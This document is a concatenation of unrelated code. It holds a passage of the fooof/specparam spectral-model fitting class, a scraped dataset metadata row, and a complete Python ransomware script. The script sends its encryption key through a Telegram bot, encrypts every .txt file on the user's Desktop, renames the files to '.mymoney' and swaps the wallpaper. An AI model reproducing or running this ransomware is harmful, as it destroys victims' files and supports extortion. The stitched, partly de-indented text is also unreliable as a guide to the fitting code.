            # Calculate the peak fit
            #   Note: if no peaks are found, this creates a flat (all zero) peak fit
            self._peak_fit = gen_periodic(self.freqs, np.ndarray.flatten(self.gaussian_params_))
            # Create peak-removed (but not flattened) power spectrum
            self._spectrum_peak_rm = self.power_spectrum - self._peak_fit
            # Pass 2: run final aperiodic fit on peak-removed power spectrum
            #   This overwrites previous aperiodic fit, and recomputes the flattened spectrum
            self.aperiodic_params_ = self._simple_ap_fit(self.freqs, self._spectrum_peak_rm)
            self._ap_fit = gen_aperiodic(self.freqs, self.aperiodic_params_)
            self._spectrum_flat = self.power_spectrum - self._ap_fit
            # Create full power_spectrum model fit
            self.modeled_spectrum_ = self._peak_fit + self._ap_fit
            # Convert gaussian definitions to peak parameters
            self.peak_params_ = self._create_peak_params(self.gaussian_params_)
            # Calculate R^2 and error of the model fit
            self._calc_r_squared()
            self._calc_error()
        except FitError:
            # If in debug mode, re-raise the error
            if self._debug:
                raise
            # Clear any interim model results that may have run
            #   Partial model results shouldn't be interpreted in light of overall failure
            self._reset_data_results(clear_results=True)
            # Print out status
            if self.verbose:
                print("Model fitting was unsuccessful.")
def print_settings(self, description=False, concise=False):
"""Print out the current settings.
Parameters
----------
description : bool, optional, default: False
Whether to print out a description with current settings.
concise : bool, optional, default: False
Whether to print the report in a concise mode, or not.
"""
print(gen_settings_str(self, description, concise))
def print_results(self, concise=False):
"""Print out model fitting results.
Parameters
----------
concise : bool, optional, default: False
Whether to print the report in a concise mode, or not.
"""
print(gen_model_results_str(self, concise))
@staticmethod
def print_report_issue(concise=False):
"""Prints instructions on how to report bugs and/or problematic fits.
Parameters
----------
concise : bool, optional, default: False
Whether to print the report in a concise mode, or not.
"""
print(gen_issue_str(concise))
def get_settings(self):
"""Return user defined settings of the current object.
Returns
-------
ModelSettings
Object containing the settings from the current object.
"""
return ModelSettings(**{key : getattr(self, key) \
for key in OBJ_DESC['settings']})
def get_run_modes(self):
"""Return run modes of the current object.
Returns
-------
ModelRunModes
Object containing the run modes from the current object.
"""
return ModelRunModes(**{key.strip('_') : getattr(self, key) \
for key in OBJ_DESC['run_modes']})
def get_meta_data(self):
"""Return data information from the current object.
Returns
-------
SpectrumMetaData
Object containing meta data from the current object.
"""
return SpectrumMetaData(**{key : getattr(self, key) \
for key in OBJ_DESC['meta_data']})
def get_data(self, component='full', space='log'):
"""Get a data component.
Parameters
----------
component : {'full', 'aperiodic', 'peak'}
Which data component to return.
'full' - full power spectrum
'aperiodic' - isolated aperiodic data component
'peak' - isolated peak data component
space : {'log', 'linear'}
Which space to return the data component in.
'log' - returns in log10 space.
'linear' - returns in linear space.
Returns
-------
output : 1d array
Specified data component, in specified spacing.
Notes
-----
The 'space' parameter doesn't just define the spacing of the data component
values, but rather defines the space of the additive data definition such that
`power_spectrum = aperiodic_component + peak_component`.
With space set as 'log', this combination holds in log space.
With space set as 'linear', this combination holds in linear space.
"""
if not self.has_data:
raise NoDataError("No data available to fit, can not proceed.")
assert space in ['linear', 'log'], "Input for 'space' invalid."
if component == 'full':
output = self.power_spectrum if space == 'log' else unlog(self.power_spectrum)
elif component == 'aperiodic':
output = self._spectrum_peak_rm if space == 'log' else \
unlog(self.power_spectrum) / unlog(self._peak_fit)
elif component == 'peak':
output = self._spectrum_flat if space == 'log' else \
unlog(self.power_spectrum) - unlog(self._ap_fit)
else:
raise ValueError('Input for component invalid.')
return output
def get_model(self, component='full', space='log'):
"""Get a model component.
Parameters
----------
component : {'full', 'aperiodic', 'peak'}
Which model component to return.
'full' - full model
'aperiodic' - isolated aperiodic model component
'peak' - isolated peak model component
space : {'log', 'linear'}
Which space to return the model component in.
'log' - returns in log10 space.
'linear' - returns in linear space.
Returns
-------
output : 1d array
Specified model component, in specified spacing.
Notes
-----
The 'space' parameter doesn't just define the spacing of the model component
values, but rather defines the space of the additive model such that
`model = aperiodic_component + peak_component`.
With space set as 'log', this combination holds in log space.
With space set as 'linear', this combination holds in linear space.
"""
if not self.has_model:
raise NoModelError("No model fit results are available, can not proceed.")
assert space in ['linear', 'log'], "Input for 'space' invalid."
if component == 'full':
output = self.modeled_spectrum_ if space == 'log' else unlog(self.modeled_spectrum_)
elif component == 'aperiodic':
output = self._ap_fit if space == 'log' else unlog(self._ap_fit)
elif component == 'peak':
output = self._peak_fit if space == 'log' else \
unlog(self.modeled_spectrum_) - unlog(self._ap_fit)
else:
raise ValueError('Input for component invalid.')
return output
def get_params(self, name, col=None):
"""Return model fit parameters for specified feature(s).
Parameters
----------
name : {'aperiodic_params', 'peak_params', 'gaussian_params', 'error', 'r_squared'}
Name of the data field to extract.
col : {'CF', 'PW', 'BW', 'offset', 'knee', 'exponent'} or int, optional
Column name / index to extract from selected data, if requested.
Only used for name of {'aperiodic_params', 'peak_params', 'gaussian_params'}.
Returns
-------
out : float or 1d array
Requested data.
Raises
------
NoModelError
If there are no model fit parameters available to return.
Notes
-----
If there are no fit peak (no peak parameters), this method will return NaN.
"""
if not self.has_model:
raise NoModelError("No model fit results are available to extract, can not proceed.")
# If col specified as string, get mapping back to integer
if isinstance(col, str):
col = get_indices(self.aperiodic_mode)[col]
# Allow for shortcut alias, without adding `_params`
if name in ['aperiodic', 'peak', 'gaussian']:
name = name + '_params'
# Extract the request data field from object
out = getattr(self, name + '_')
# Periodic values can be empty arrays and if so, replace with NaN array
if isinstance(out, np.ndarray) and out.size == 0:
out = np.array([np.nan, np.nan, np.nan])
# Select out a specific column, if requested
if col is not None:
# Extract column, & if result is a single value in an array, unpack from array
out = out[col] if out.ndim == 1 else out[:, col]
out = out[0] if isinstance(out, np.ndarray) and out.size == 1 else out
return out
def get_results(self):
"""Return model fit parameters and goodness of fit metrics.
Returns
-------
FitResults
Object containing the model fit results from the current object.
"""
return FitResults(**{key.strip('_') : getattr(self, key) \
for key in OBJ_DESC['results']})
    @copy_doc_func_to_method(plot_model)
    def plot(self, plot_peaks=None, plot_aperiodic=True, freqs=None, power_spectrum=None,
             freq_range=None, plt_log=False, add_legend=True, ax=None, data_kwargs=None,
             model_kwargs=None, aperiodic_kwargs=None, peak_kwargs=None, **plot_kwargs):
        # Thin pass-through to `plot_model`; the docstring is attached at
        # runtime from that function by the decorator above
        plot_model(self, plot_peaks=plot_peaks, plot_aperiodic=plot_aperiodic, freqs=freqs,
                   power_spectrum=power_spectrum, freq_range=freq_range, plt_log=plt_log,
                   add_legend=add_legend, ax=ax, data_kwargs=data_kwargs, model_kwargs=model_kwargs,
                   aperiodic_kwargs=aperiodic_kwargs, peak_kwargs=peak_kwargs, **plot_kwargs)
    @copy_doc_func_to_method(save_model_report)
    def save_report(self, file_name, file_path=None, plt_log=False,
                    add_settings=True, **plot_kwargs):
        # Thin pass-through to `save_model_report`; the docstring is attached
        # at runtime from that function by the decorator above
        save_model_report(self, file_name, file_path, plt_log, add_settings, **plot_kwargs)
    @copy_doc_func_to_method(save_model)
    def save(self, file_name, file_path=None, append=False,
             save_results=False, save_settings=False, save_data=False):
        # Thin pass-through to `save_model`; the docstring is attached at
        # runtime from that function by the decorator above
        save_model(self, file_name, file_path, append, save_results, save_settings, save_data)
def load(self, file_name, file_path=None, regenerate=True):
"""Load in a data file to the current object.
Parameters
----------
file_name : str or FileObject
File to load data from.
file_path : Path or str, optional
Path to directory to load from. If None, loads from current directory.
regenerate : bool, optional, default: True
Whether to regenerate the model fit from the loaded data, if data is available.
"""
# Reset data in object, so old data can't interfere
self._reset_data_results(True, True, True)
# Load JSON file, add to self and check loaded data
data = load_json(file_name, file_path)
self._add_from_dict(data)
self._check_loaded_settings(data)
self._check_loaded_results(data)
# Regenerate model components, based on what is available
if regenerate:
if self.freq_res:
self._regenerate_freqs()
if np.all(self.freqs) and np.all(self.aperiodic_params_):
self._regenerate_model()
    def copy(self):
        """Return a deep copy of the current object, including all loaded data and fit results."""
        return deepcopy(self)
def set_debug_mode(self, debug):
"""Set debug mode, which controls if an error is raised if model fitting is unsuccessful.
Parameters
----------
debug : bool
Whether to run in debug mode.
"""
self._debug = debug
def set_check_modes(self, check_freqs=None, check_data=None):
"""Set check modes, which controls if an error is raised based on check on the inputs.
Parameters
----------
check_freqs : bool, optional
Whether to run in check freqs mode, which checks the frequency data.
check_data : bool, optional
Whether to run in check data mode, which checks the power spectrum values data.
"""
if check_freqs is not None:
self._check_freqs = check_freqs
if check_data is not None:
self._check_data = check_data
    # This kept for backwards compatibility, but to be removed in 2.0 in favor of `set_check_modes`
    def set_check_data_mode(self, check_data):
        """Set check data mode, which controls if an error is raised if NaN or Inf data are added.

        Parameters
        ----------
        check_data : bool
            Whether to run in check data mode.
        """
        # Deprecated alias: forward to the consolidated setter
        self.set_check_modes(check_data=check_data)
    def set_run_modes(self, debug, check_freqs, check_data):
        """Simultaneously set all run modes.

        Parameters
        ----------
        debug : bool
            Whether to run in debug mode.
        check_freqs : bool
            Whether to run in check freqs mode.
        check_data : bool
            Whether to run in check data mode.
        """
        # Delegate to the individual mode setters
        self.set_debug_mode(debug)
        self.set_check_modes(check_freqs, check_data)
    def to_df(self, peak_org):
        """Convert and extract the model results as a pandas object.

        Parameters
        ----------
        peak_org : int or Bands
            How to organize peaks.
            If int, extracts the first n peaks.
            If Bands, extracts peaks based on band definitions.

        Returns
        -------
        pd.Series
            Model results organized into a pandas object.
        """
        # Conversion is handled by the shared dataframe utility, on the current results
        return model_to_dataframe(self.get_results(), peak_org)
    def _check_width_limits(self):
        """Check and warn about peak width limits / frequency resolution interaction."""
        # Check peak width limits against frequency resolution and warn if too close
        #   1.5 * resolution is the heuristic threshold below which widths are unreliable
        if 1.5 * self.freq_res >= self.peak_width_limits[0]:
            print(gen_width_warning_str(self.freq_res, self.peak_width_limits[0]))
    def _simple_ap_fit(self, freqs, power_spectrum):
        """Fit the aperiodic component of the power spectrum.

        Parameters
        ----------
        freqs : 1d array
            Frequency values for the power_spectrum, in linear scale.
        power_spectrum : 1d array
            Power values, in log10 scale.

        Returns
        -------
        aperiodic_params : 1d array
            Parameter estimates for aperiodic fit.

        Raises
        ------
        FitError
            If the fitting encounters an error.
        """
        # Get the guess parameters and/or calculate from the data, as needed
        #   Note that these are collected as lists, to concatenate with or without knee later
        off_guess = [power_spectrum[0] if not self._ap_guess[0] else self._ap_guess[0]]
        kne_guess = [self._ap_guess[1]] if self.aperiodic_mode == 'knee' else []
        # NOTE(review): the exponent guess reads self.power_spectrum / self.freqs rather than
        #   the `freqs` / `power_spectrum` arguments -- presumably equivalent for current
        #   callers, but confirm if called with trimmed inputs.
        exp_guess = [np.abs((self.power_spectrum[-1] - self.power_spectrum[0]) /
                            (np.log10(self.freqs[-1]) - np.log10(self.freqs[0])))
                     if not self._ap_guess[2] else self._ap_guess[2]]
        # Get bounds for aperiodic fitting, dropping knee bound if not set to fit knee
        ap_bounds = self._ap_bounds if self.aperiodic_mode == 'knee' \
            else tuple(bound[0::2] for bound in self._ap_bounds)
        # Collect together guess parameters
        guess = np.array(off_guess + kne_guess + exp_guess)
        # Ignore warnings that are raised in curve_fit
        #   A runtime warning can occur while exploring parameters in curve fitting
        #   This doesn't effect outcome - it won't settle on an answer that does this
        #   It happens if / when b < 0 & |b| > x**2, as it leads to log of a negative number
        try:
            with warnings.catch_warnings():
                warnings.simplefilter("ignore")
                aperiodic_params, _ = curve_fit(get_ap_func(self.aperiodic_mode),
                                                freqs, power_spectrum, p0=guess,
                                                maxfev=self._maxfev, bounds=ap_bounds,
                                                ftol=self._tol, xtol=self._tol, gtol=self._tol,
                                                check_finite=False)
        except RuntimeError as excp:
            error_msg = ("Model fitting failed due to not finding parameters in "
                         "the simple aperiodic component fit.")
            raise FitError(error_msg) from excp
        return aperiodic_params
    def _robust_ap_fit(self, freqs, power_spectrum):
        """Fit the aperiodic component of the power spectrum robustly, ignoring outliers.

        Parameters
        ----------
        freqs : 1d array
            Frequency values for the power spectrum, in linear scale.
        power_spectrum : 1d array
            Power values, in log10 scale.

        Returns
        -------
        aperiodic_params : 1d array
            Parameter estimates for aperiodic fit.

        Raises
        ------
        FitError
            If the fitting encounters an error.
        """
        # Do a quick, initial aperiodic fit
        popt = self._simple_ap_fit(freqs, power_spectrum)
        initial_fit = gen_aperiodic(freqs, popt)
        # Flatten power_spectrum based on initial aperiodic fit
        flatspec = power_spectrum - initial_fit
        # Flatten outliers, defined as any points that drop below 0
        flatspec[flatspec < 0] = 0
        # Use percentile threshold, in terms of # of points, to extract and re-fit
        #   Points above the threshold (likely peaks) are excluded from the re-fit
        perc_thresh = np.percentile(flatspec, self._ap_percentile_thresh)
        perc_mask = flatspec <= perc_thresh
        freqs_ignore = freqs[perc_mask]
        spectrum_ignore = power_spectrum[perc_mask]
        # Get bounds for aperiodic fitting, dropping knee bound if not set to fit knee
        ap_bounds = self._ap_bounds if self.aperiodic_mode == 'knee' \
            else tuple(bound[0::2] for bound in self._ap_bounds)
        # Second aperiodic fit - using results of first fit as guess parameters
        #   See note in _simple_ap_fit about warnings
        try:
            with warnings.catch_warnings():
                warnings.simplefilter("ignore")
                aperiodic_params, _ = curve_fit(get_ap_func(self.aperiodic_mode),
                                                freqs_ignore, spectrum_ignore, p0=popt,
                                                maxfev=self._maxfev, bounds=ap_bounds,
                                                ftol=self._tol, xtol=self._tol, gtol=self._tol,
                                                check_finite=False)
        except RuntimeError as excp:
            error_msg = ("Model fitting failed due to not finding "
                         "parameters in the robust aperiodic fit.")
            raise FitError(error_msg) from excp
        except TypeError as excp:
            error_msg = ("Model fitting failed due to sub-sampling "
                         "in the robust aperiodic fit.")
            raise FitError(error_msg) from excp
        return aperiodic_params
    def _fit_peaks(self, flat_iter):
        """Iteratively fit peaks to flattened spectrum.

        Parameters
        ----------
        flat_iter : 1d array
            Flattened power spectrum values.

        Returns
        -------
        gaussian_params : 2d array
            Parameters that define the gaussian fit(s).
            Each row is a gaussian, as [mean, height, standard deviation].
        """
        # Initialize matrix of guess parameters for gaussian fitting
        guess = np.empty([0, 3])
        # Find peak: Loop through, finding a candidate peak, and fitting with a guess gaussian
        #   Stopping procedures: limit on # of peaks, or relative or absolute height thresholds
        while len(guess) < self.max_n_peaks:
            # Find candidate peak - the maximum point of the flattened spectrum
            max_ind = np.argmax(flat_iter)
            max_height = flat_iter[max_ind]
            # Stop searching for peaks once height drops below height threshold
            if max_height <= self.peak_threshold * np.std(flat_iter):
                break
            # Set the guess parameters for gaussian fitting, specifying the mean and height
            guess_freq = self.freqs[max_ind]
            guess_height = max_height
            # Halt fitting process if candidate peak drops below minimum height
            if not guess_height > self.min_peak_height:
                break
            # Data-driven first guess at standard deviation
            #   Find half height index on each side of the center frequency
            half_height = 0.5 * max_height
            le_ind = next((val for val in range(max_ind - 1, 0, -1)
                           if flat_iter[val] <= half_height), None)
            ri_ind = next((val for val in range(max_ind + 1, len(flat_iter), 1)
                           if flat_iter[val] <= half_height), None)
            # Guess bandwidth procedure: estimate the width of the peak
            try:
                # Get an estimated width from the shortest side of the peak
                #   We grab shortest to avoid estimating very large values from overlapping peaks
                #   Grab the shortest side, ignoring a side if the half max was not found
                short_side = min([abs(ind - max_ind) \
                    for ind in [le_ind, ri_ind] if ind is not None])
                # Use the shortest side to estimate full-width, half max (converted to Hz)
                #   and use this to estimate that guess for gaussian standard deviation
                fwhm = short_side * 2 * self.freq_res
                guess_std = compute_gauss_std(fwhm)
            except ValueError:
                # This procedure can fail (very rarely), if both left & right inds end up as None
                #   In this case, default the guess to the average of the peak width limits
                guess_std = np.mean(self.peak_width_limits)
            # Check that guess value isn't outside preset limits - restrict if so
            #   Note: without this, curve_fitting fails if given guess > or < bounds
            if guess_std < self._gauss_std_limits[0]:
                guess_std = self._gauss_std_limits[0]
            if guess_std > self._gauss_std_limits[1]:
                guess_std = self._gauss_std_limits[1]
            # Collect guess parameters and subtract this guess gaussian from the data
            guess = np.vstack((guess, (guess_freq, guess_height, guess_std)))
            peak_gauss = gaussian_function(self.freqs, guess_freq, guess_height, guess_std)
            flat_iter = flat_iter - peak_gauss
        # Check peaks based on edges, and on overlap, dropping any that violate requirements
        guess = self._drop_peak_cf(guess)
        guess = self._drop_peak_overlap(guess)
        # If there are peak guesses, fit the peaks, and sort results
        if len(guess) > 0:
            gaussian_params = self._fit_peak_guess(guess)
            gaussian_params = gaussian_params[gaussian_params[:, 0].argsort()]
        else:
            gaussian_params = np.empty([0, 3])
        return gaussian_params
    def _fit_peak_guess(self, guess):
        """Fits a group of peak guesses with a fit function.

        Parameters
        ----------
        guess : 2d array, shape=[n_peaks, 3]
            Guess parameters for gaussian fits to peaks, as gaussian parameters.

        Returns
        -------
        gaussian_params : 2d array, shape=[n_peaks, 3]
            Parameters for gaussian fits to peaks, as gaussian parameters.

        Raises
        ------
        FitError
            If the fitting encounters an error.
        """
        # Set the bounds for CF, enforce positive height value, and set bandwidth limits
        #   Note that 'guess' is in terms of gaussian std, so +/- BW is 2 * the guess_gauss_std
        #   This set of list comprehensions is a way to end up with bounds in the form:
        #     ((cf_low_peak1, height_low_peak1, bw_low_peak1, *repeated for n_peaks*),
        #      (cf_high_peak1, height_high_peak1, bw_high_peak, *repeated for n_peaks*))
        #     ^where each value sets the bound on the specified parameter
        lo_bound = [[peak[0] - 2 * self._cf_bound * peak[2], 0, self._gauss_std_limits[0]]
                    for peak in guess]
        hi_bound = [[peak[0] + 2 * self._cf_bound * peak[2], np.inf, self._gauss_std_limits[1]]
                    for peak in guess]
        # Check that CF bounds are within frequency range
        #   If they are not, update them to be restricted to frequency range
        lo_bound = [bound if bound[0] > self.freq_range[0] else \
            [self.freq_range[0], *bound[1:]] for bound in lo_bound]
        hi_bound = [bound if bound[0] < self.freq_range[1] else \
            [self.freq_range[1], *bound[1:]] for bound in hi_bound]
        # Unpacks the embedded lists into flat tuples
        #   This is what the fit function requires as input
        gaus_param_bounds = (tuple(item for sublist in lo_bound for item in sublist),
                             tuple(item for sublist in hi_bound for item in sublist))
        # Flatten guess, for use with curve fit
        guess = np.ndarray.flatten(guess)
        # Fit the peaks
        try:
            gaussian_params, _ = curve_fit(gaussian_function, self.freqs, self._spectrum_flat,
                                           p0=guess, maxfev=self._maxfev, bounds=gaus_param_bounds,
                                           ftol=self._tol, xtol=self._tol, gtol=self._tol,
                                           check_finite=False, jac=jacobian_gauss)
        except RuntimeError as excp:
            error_msg = ("Model fitting failed due to not finding "
                         "parameters in the peak component fit.")
            raise FitError(error_msg) from excp
        except LinAlgError as excp:
            error_msg = ("Model fitting failed due to a LinAlgError during peak fitting. "
                         "This can happen with settings that are too liberal, leading, "
                         "to a large number of guess peaks that cannot be fit together.")
            raise FitError(error_msg) from excp
        # Re-organize params into 2d matrix, one row per fit gaussian
        gaussian_params = np.array(group_three(gaussian_params))
        return gaussian_params
    def _create_peak_params(self, gaus_params):
        """Copies over the gaussian params to peak outputs, updating as appropriate.

        Parameters
        ----------
        gaus_params : 2d array
            Parameters that define the gaussian fit(s), as gaussian parameters.

        Returns
        -------
        peak_params : 2d array
            Fitted parameter values for the peaks, with each row as [CF, PW, BW].

        Notes
        -----
        The gaussian center is unchanged as the peak center frequency.

        The gaussian height is updated to reflect the height of the peak above
        the aperiodic fit. This is returned instead of the gaussian height, as
        the gaussian height is harder to interpret, due to peak overlaps.

        The gaussian standard deviation is updated to be 'both-sided', to reflect the
        'bandwidth' of the peak, as opposed to the gaussian parameter, which is 1-sided.

        Performing this conversion requires that the model has been run,
        with `freqs`, `modeled_spectrum_` and `_ap_fit` all required to be available.
        """
        peak_params = np.empty((len(gaus_params), 3))
        for ii, peak in enumerate(gaus_params):
            # Gets the index of the power_spectrum at the frequency closest to the CF of the peak
            ind = np.argmin(np.abs(self.freqs - peak[0]))
            # Collect peak parameter data
            #   PW: model height above aperiodic fit; BW: 2 * gaussian std (both-sided)
            peak_params[ii] = [peak[0], self.modeled_spectrum_[ind] - self._ap_fit[ind],
                               peak[2] * 2]
        return peak_params
def _drop_peak_cf(self, guess):
"""Check whether to drop peaks based on center's proximity to the edge of the spectrum.
Parameters
----------
guess : 2d array
Guess parameters for gaussian peak fits. Shape: [n_peaks, 3].
Returns
-------
guess : 2d array
Guess parameters for gaussian peak fits. Shape: [n_peaks, 3].
"""
cf_params = guess[:, 0]
bw_params = guess[:, 2] * self._bw_std_edge
# Check if peaks within drop threshold from the edge of the frequency range
keep_peak = \
(np.abs(np.subtract(cf_params, self.freq_range[0])) > bw_params) & \
(np.abs(np.subtract(cf_params, self.freq_range[1])) > bw_params)
# Drop peaks that fail the center frequency edge criterion
guess = np.array([gu for (gu, keep) in zip(guess, keep_peak) if keep])
return guess
    def _drop_peak_overlap(self, guess):
        """Checks whether to drop gaussians based on amount of overlap.

        Parameters
        ----------
        guess : 2d array
            Guess parameters for gaussian peak fits. Shape: [n_peaks, 3].

        Returns
        -------
        guess : 2d array
            Guess parameters for gaussian peak fits. Shape: [n_peaks, 3].

        Notes
        -----
        For any gaussians with an overlap that crosses the threshold,
        the lowest height guess Gaussian is dropped.
        """
        # Sort the peak guesses by increasing frequency
        #   This is so adjacent peaks can be compared from right to left
        #   (note: sorted() turns the 2d array into a list of row arrays)
        guess = sorted(guess, key=lambda x: float(x[0]))
        # Calculate standard deviation bounds for checking amount of overlap
        #   The bounds are the gaussian frequency +/- gaussian standard deviation
        bounds = [[peak[0] - peak[2] * self._gauss_overlap_thresh,
                   peak[0] + peak[2] * self._gauss_overlap_thresh] for peak in guess]
        # Loop through peak bounds, comparing current bound to that of next peak
        #   If the left peak's upper bound extends pass the right peaks lower bound,
        #   then drop the Gaussian with the lower height
        drop_inds = []
        for ind, b_0 in enumerate(bounds[:-1]):
            b_1 = bounds[ind + 1]
            # Check if bound of current peak extends into next peak
            if b_0[1] > b_1[0]:
                # If so, get the index of the gaussian with the lowest height (to drop)
                drop_inds.append([ind, ind + 1][np.argmin([guess[ind][1], guess[ind + 1][1]])])
        # Drop any peaks guesses that overlap too much, based on threshold
        keep_peak = [not ind in drop_inds for ind in range(len(guess))]
        guess = np.array([gu for (gu, keep) in zip(guess, keep_peak) if keep])
        return guess
def _calc_r_squared(self):
"""Calculate the r-squared goodness of fit of the model, compared to the original data."""
r_val = np.corrcoef(self.power_spectrum, self.modeled_spectrum_)
self.r_squared_ = r_val[0][1] ** 2
def _calc_error(self, metric=None):
"""Calculate the overall error of the model fit, compared to the original data.
Parameters
----------
metric : {'MAE', 'MSE', 'RMSE'}, optional
Which error measure to calculate:
* 'MAE' : mean absolute error
* 'MSE' : mean squared error
* 'RMSE' : root mean squared error
Raises
------
ValueError
If the requested error metric is not understood.
Notes
-----
Which measure is applied is by default controlled by the `_error_metric` attribute.
"""
# If metric is not specified, use the default approach
metric = self._error_metric if not metric else metric
if metric == 'MAE':
self.error_ = np.abs(self.power_spectrum - self.modeled_spectrum_).mean()
elif metric == 'MSE':
self.error_ = ((self.power_spectrum - self.modeled_spectrum_) ** 2).mean()
elif metric == 'RMSE':
self.error_ = np.sqrt(((self.power_spectrum - self.modeled_spectrum_) ** 2).mean())
else:
error_msg = "Error metric '{}' not understood or not implemented.".format(metric)
raise ValueError(error_msg)
    def _prepare_data(self, freqs, power_spectrum, freq_range, spectra_dim=1):
        """Prepare input data for adding to current object.

        Parameters
        ----------
        freqs : 1d array
            Frequency values for the power_spectrum, in linear space.
        power_spectrum : 1d or 2d array
            Power values, which must be input in linear space.
            1d vector, or 2d as [n_power_spectra, n_freqs].
        freq_range : list of [float, float]
            Frequency range to restrict power spectrum to.
            If None, keeps the entire range.
        spectra_dim : int, optional, default: 1
            Dimensionality that the power spectra should have.

        Returns
        -------
        freqs : 1d array
            Frequency values for the power_spectrum, in linear space.
        power_spectrum : 1d or 2d array
            Power spectrum values, in log10 scale.
            1d vector, or 2d as [n_power_specta, n_freqs].
        freq_range : list of [float, float]
            Minimum and maximum values of the frequency vector.
        freq_res : float
            Frequency resolution of the power spectrum.

        Raises
        ------
        DataError
            If there is an issue with the data.
        InconsistentDataError
            If the input data are inconsistent size.
        """
        # Check that data are the right types
        if not isinstance(freqs, np.ndarray) or not isinstance(power_spectrum, np.ndarray):
            raise DataError("Input data must be numpy arrays.")
        # Check that data have the right dimensionality
        if freqs.ndim != 1 or (power_spectrum.ndim != spectra_dim):
            raise DataError("Inputs are not the right dimensions.")
        # Check that data sizes are compatible
        if freqs.shape[-1] != power_spectrum.shape[-1]:
            raise InconsistentDataError("The input frequencies and power spectra "
                                        "are not consistent size.")
        # Check if power values are complex
        if np.iscomplexobj(power_spectrum):
            raise DataError("Input power spectra are complex values. "
                            "Model fitting does not currently support complex inputs.")
        # Force data to be dtype of float64
        #   If they end up as float32, or less, scipy curve_fit fails (sometimes implicitly)
        if freqs.dtype != 'float64':
            freqs = freqs.astype('float64')
        if power_spectrum.dtype != 'float64':
            power_spectrum = power_spectrum.astype('float64')
        # Check frequency range, trim the power_spectrum range if requested
        if freq_range:
            freqs, power_spectrum = trim_spectrum(freqs, power_spectrum, freq_range)
        # Check if freqs start at 0 and move up one value if so
        #   Aperiodic fit gets an inf if freq of 0 is included, which leads to an error
        if freqs[0] == 0.0:
            freqs, power_spectrum = trim_spectrum(freqs, power_spectrum, [freqs[1], freqs.max()])
            if self.verbose:
                print("\nFITTING WARNING: Skipping frequency == 0, "
                      "as this causes a problem with fitting.")
        # Calculate frequency resolution, and actual frequency range of the data
        freq_range = [freqs.min(), freqs.max()]
        freq_res = freqs[1] - freqs[0]
        # Log power values
        power_spectrum = np.log10(power_spectrum)
        ## Data checks - run checks on inputs based on check modes
        if self._check_freqs:
            # Check if the frequency data is unevenly spaced, and raise an error if so
            freq_diffs = np.diff(freqs)
            if not np.all(np.isclose(freq_diffs, freq_res)):
                raise DataError("The input frequency values are not evenly spaced. "
                                "The model expects equidistant frequency values in linear space.")
        if self._check_data:
            # Check if there are any infs / nans, and raise an error if so
            if np.any(np.isinf(power_spectrum)) or np.any(np.isnan(power_spectrum)):
                error_msg = ("The input power spectra data, after logging, contains NaNs or Infs. "
                             "This will cause the fitting to fail. "
                             "One reason this can happen is if inputs are already logged. "
                             "Input data should be in linear spacing, not log.")
                raise DataError(error_msg)
        return freqs, power_spectrum, freq_range, freq_res
def _add_from_dict(self, data):
"""Add data to object from a dictionary.
Parameters
----------
data : dict
Dictionary of data to add to self.
"""
# Reconstruct object from loaded data
for key in data.keys():
setattr(self, key, data[key])
    def _check_loaded_results(self, data):
        """Check if results have been added and check data.

        Parameters
        ----------
        data : dict
            A dictionary of data that has been added to the object.
        """
        # If results loaded, check dimensions of peak parameters
        #   This fixes an issue where they end up the wrong shape if they are empty (no peaks)
        if set(OBJ_DESC['results']).issubset(set(data.keys())):
            self.peak_params_ = check_array_dim(self.peak_params_)
            self.gaussian_params_ = check_array_dim(self.gaussian_params_)
    def _check_loaded_settings(self, data):
        """Check if settings added, and update the object as needed.

        Parameters
        ----------
        data : dict
            A dictionary of data that has been added to the object.
        """
        # If settings not loaded from file, clear from object, so that default
        # settings, which are potentially wrong for loaded data, aren't kept
        if not set(OBJ_DESC['settings']).issubset(set(data.keys())):
            # Reset all public settings to None
            for setting in OBJ_DESC['settings']:
                setattr(self, setting, None)
            # If aperiodic params available, infer whether knee fitting was used,
            #   based on the number of fit parameters
            if not np.all(np.isnan(self.aperiodic_params_)):
                self.aperiodic_mode = infer_ap_func(self.aperiodic_params_)
        # Reset internal settings so that they are consistent with what was loaded
        #   Note that this will set internal settings to None, if public settings unavailable
        self._reset_internal_settings()
    def _regenerate_freqs(self):
        """Regenerate the frequency vector, given the object metadata."""
        # Rebuild from the stored range and resolution, rather than re-loading data
        self.freqs = gen_freqs(self.freq_range, self.freq_res)
    def _regenerate_model(self):
        """Regenerate model fit from parameters."""
        # Rebuild the full model and its components from the stored fit parameters
        self.modeled_spectrum_, self._peak_fit, self._ap_fit = gen_model(
            self.freqs, self.aperiodic_params_, self.gaussian_params_, return_components=True)
| fooof-tools/fooof | specparam/objs/fit.py | fit.py | py | 60,820 | python | en | code | 312 | github-code | 50 |
9565218848 | import os
import base64
from cryptography.fernet import Fernet
import sent_mes
import wp
class Ramsomware:
def __init__(self, key=None):
self.key = key
self.typ_crypt = None
self.file_target = ['txt']
def generator_key(self):
self.key = Fernet.generate_key()
self.typ_crypt = Fernet(self.key)
sent_mes.telegram_bot_sendtext(str(self.key))
def read_key(self, path="24124576.txt"):
with open(path, 'rb') as files_closed:
aa = files_closed.read()
self.key = files_closed.read()
self.key = aa
def seerch_file(self, path, types, w=False):
for root, dirs, files in os.walk(path):
for name in files:
f = os.path.join(root, name)
if types in f:
if w == True:
self.uncrypt(f)
else:
self.crypt(f)
def crypt(self, path):
with open(path, 'rb') as f:
data = f.read()
fernet = Fernet(self.key)
encrypted = fernet.encrypt(data)
with open(path,'wb') as f:
f.write(encrypted)
base = os.path.splitext(path)[0]
os.rename(path, base + '.mymoney')
def uncrypt(self, path):
base = os.path.splitext(path)[0]
os.rename(path, base + '.txt')
path = base + '.txt'
with open(path,'rb') as f:
data = f.read()
fernet = Fernet(self.key)
encrypted = fernet.decrypt(data)
with open(path, 'wb') as f:
f.write(encrypted)
def check_password(self):
return os.path.exists('24124576.txt')
def check_crypt(path_dmg, types):
for root, dirs, files in os.walk(path_dmg):
for name in files:
f = os.path.join(root, name)
if types in f:
return True
return False
def start_to_the_end():
User=str(os.getenv('USERPROFILE'))
User = User + '\\Desktop'
wr = Ramsomware()
print(User)
if check_crypt(User,'.txt') & ~wr.check_password():
wr.generator_key()
wr.seerch_file(User,'.txt')
dir = os.path.abspath(os.curdir)
imagePath = dir + "/bin/text/exe/1.jpg"
wp.changeBG(imagePath)
else:
if check_crypt(User,'.mymoney') & wr.check_password():
wr.read_key()
wr.seerch_file(User,'.mymoney', True)
else:
print('nie ok')
start_to_the_end()
